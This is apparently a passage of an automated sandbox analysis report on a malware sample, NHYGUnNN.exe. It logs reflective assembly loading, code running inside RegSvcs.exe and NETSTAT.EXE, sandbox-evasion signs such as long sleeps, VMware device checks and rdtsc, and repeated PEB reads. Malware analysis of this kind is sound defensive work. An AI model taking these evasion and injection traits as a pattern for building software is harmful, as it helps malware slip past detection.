      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdbBSJB source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdbBSJB source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp

      Data Obfuscation

      Source: NHYGUnNN.exe, A/cb0864eb24eeeb94488d89ba2673ea289.cs .Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 0.2.NHYGUnNN.exe.12a25d20000.0.unpack, A/cb0864eb24eeeb94488d89ba2673ea289.cs .Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 0.0.NHYGUnNN.exe.12a25d20000.0.unpack, A/cb0864eb24eeeb94488d89ba2673ea289.cs .Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\NHYGUnNN.exe Code function: 0_2_0000012A25D250CF push rdx; ret 0_2_0000012A25D250D5
      Source: C:\Users\user\Desktop\NHYGUnNN.exe Code function: 0_2_00007FFCA43F417B push edx; ret 0_2_00007FFCA43F417C
      Source: C:\Users\user\Desktop\NHYGUnNN.exe Code function: 0_2_00007FFCA43F4185 push edx; ret 0_2_00007FFCA43F4186
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0134D0D1 push ecx; ret 1_2_0134D0E4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004210E9 push eax; ret 1_2_004210EF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004210F2 push eax; ret 1_2_00421159
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0042109C push eax; ret 1_2_004210EF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00421153 push eax; ret 1_2_00421159
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041E901 push ebp; ret 1_2_0041E902
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00405A1E push ecx; ret 1_2_004059E1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004172D0 push edx; retf 1_2_004172D6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0040A2E4 push ecx; iretd 1_2_0040A2E7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00409B74 push ecx; retf 1_2_00409B7C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00408BAF push cx; ret 1_2_00408C27
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00409CB7 push cs; retf 1_2_00409CCF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041A528 push ebp; ret 1_2_0041A532
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004085F9 pushfd ; iretd 1_2_00408601
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0040CF66 push cs; ret 1_2_0040CF69
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041AFA7 push ecx; ret 1_2_0041AFA8
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035ED0D1 push ecx; ret 10_2_035ED0E4
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BCB82F push cs; ret 10_2_00BCB832
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BD9870 push ecx; ret 10_2_00BD9871
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDF9BB push eax; ret 10_2_00BDFA22
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDF9B2 push eax; ret 10_2_00BDF9B8
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDD1CA push ebp; ret 10_2_00BDD1CB
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDF965 push eax; ret 10_2_00BDF9B8
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC423B push ds; iretd 10_2_00BC4250
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDFA1C push eax; ret 10_2_00BDFA22
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC4212 push ds; iretd 10_2_00BC4250
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC4254 push 793A76E7h; ret 10_2_00BC425C
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BD5B99 push edx; retf 10_2_00BD5B9F
      Source: initial sample Static PE information: section name: .text entropy: 7.879743437690199
      Source: C:\Users\user\Desktop\NHYGUnNN.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NHYGUnNN.exe TID: 5188 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4760 Thread sleep time: -36000s >= -30000s
      Source: C:\Windows\explorer.exe Last function: Thread delayed
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C5BA5 rdtsc 1_2_013C5BA5
      Source: C:\Users\user\Desktop\NHYGUnNN.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 6.1 %
      Source: C:\Windows\SysWOW64\NETSTAT.EXE API coverage: 9.6 %
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information queried: ProcessInformation
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BD2CA0 FindFirstFileW,FindNextFileW,FindClose, 10_2_00BD2CA0
      Source: NHYGUnNN.exe, 00000000.00000002.240647032.0000012A3AB7D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3Ts+
      Source: NHYGUnNN.exe, 00000000.00000002.239226226.0000012A39A02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/
      Source: explorer.exe, 00000002.00000000.296608102.00000000045B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.303615769.00000000081DD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
      Source: explorer.exe, 00000002.00000000.279110893.0000000006710000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
      Source: explorer.exe, 00000002.00000000.282562714.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATAi
      Source: NHYGUnNN.exe, 00000000.00000002.240917397.0000012A3ABFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/VphMpV3Ts+
      Source: NHYGUnNN.exe, 00000000.00000002.241144747.0000012A3AC7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %C30PR9jBAtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/VphMpV3Ts+
      Source: explorer.exe, 00000002.00000000.252879418.0000000008304000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: NHYGUnNN.exe, 00000000.00000002.240357022.0000012A3AAF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3
      Source: NHYGUnNN.exe, 00000000.00000002.239851941.0000012A3AA71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %tZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3
      Source: explorer.exe, 00000002.00000000.282562714.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: explorer.exe, 00000002.00000000.252366258.0000000008200000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132513A mov eax, dword ptr fs:[00000030h] 1_2_0132513A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F5210 mov ecx, dword ptr fs:[00000030h]1_2_012F5210
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h]1_2_012F5210
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h]1_2_012F5210
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133927A mov eax, dword ptr fs:[00000030h]1_2_0133927A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AB260 mov eax, dword ptr fs:[00000030h]1_2_013AB260
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AB260 mov eax, dword ptr fs:[00000030h]1_2_013AB260
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8A62 mov eax, dword ptr fs:[00000030h]1_2_013C8A62
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BEA55 mov eax, dword ptr fs:[00000030h]1_2_013BEA55
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]1_2_012F9240
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]1_2_012F9240
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]1_2_012F9240
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]1_2_012F9240
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01384257 mov eax, dword ptr fs:[00000030h]1_2_01384257
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130AAB0 mov eax, dword ptr fs:[00000030h]1_2_0130AAB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130AAB0 mov eax, dword ptr fs:[00000030h]1_2_0130AAB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132FAB0 mov eax, dword ptr fs:[00000030h]1_2_0132FAB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]1_2_012F52A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]1_2_012F52A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]1_2_012F52A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]1_2_012F52A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]1_2_012F52A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132D294 mov eax, dword ptr fs:[00000030h]1_2_0132D294
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132D294 mov eax, dword ptr fs:[00000030h]1_2_0132D294
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322AE4 mov eax, dword ptr fs:[00000030h]1_2_01322AE4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322ACB mov eax, dword ptr fs:[00000030h]1_2_01322ACB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0137A537 mov eax, dword ptr fs:[00000030h]1_2_0137A537
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BE539 mov eax, dword ptr fs:[00000030h]1_2_013BE539
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8D34 mov eax, dword ptr fs:[00000030h]1_2_013C8D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h]1_2_01324D3B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h]1_2_01324D3B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h]1_2_01324D3B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FAD30 mov eax, dword ptr fs:[00000030h]1_2_012FAD30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131C577 mov eax, dword ptr fs:[00000030h]1_2_0131C577
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131C577 mov eax, dword ptr fs:[00000030h]1_2_0131C577
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01317D50 mov eax, dword ptr fs:[00000030h]1_2_01317D50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01333D43 mov eax, dword ptr fs:[00000030h]1_2_01333D43
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01373540 mov eax, dword ptr fs:[00000030h]1_2_01373540
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A3D40 mov eax, dword ptr fs:[00000030h]1_2_013A3D40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h]1_2_01321DB5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h]1_2_01321DB5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h]1_2_01321DB5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C05AC mov eax, dword ptr fs:[00000030h]1_2_013C05AC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C05AC mov eax, dword ptr fs:[00000030h]1_2_013C05AC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013235A1 mov eax, dword ptr fs:[00000030h]1_2_013235A1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]1_2_012F2D8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]1_2_012F2D8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]1_2_012F2D8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]1_2_012F2D8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]1_2_012F2D8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132FD9B mov eax, dword ptr fs:[00000030h]1_2_0132FD9B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132FD9B mov eax, dword ptr fs:[00000030h]1_2_0132FD9B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]1_2_01322581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]1_2_01322581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]1_2_01322581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]1_2_01322581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A8DF1 mov eax, dword ptr fs:[00000030h]1_2_013A8DF1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130D5E0 mov eax, dword ptr fs:[00000030h]1_2_0130D5E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130D5E0 mov eax, dword ptr fs:[00000030h]1_2_0130D5E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]1_2_013BFDE2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]1_2_013BFDE2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]1_2_013BFDE2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]1_2_013BFDE2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]1_2_01376DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]1_2_01376DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]1_2_01376DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov ecx, dword ptr fs:[00000030h]1_2_01376DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]1_2_01376DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]1_2_01376DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132BC2C mov eax, dword ptr fs:[00000030h]1_2_0132BC2C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C740D mov eax, dword ptr fs:[00000030h]1_2_013C740D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C740D mov eax, dword ptr fs:[00000030h]1_2_013C740D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C740D mov eax, dword ptr fs:[00000030h]1_2_013C740D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
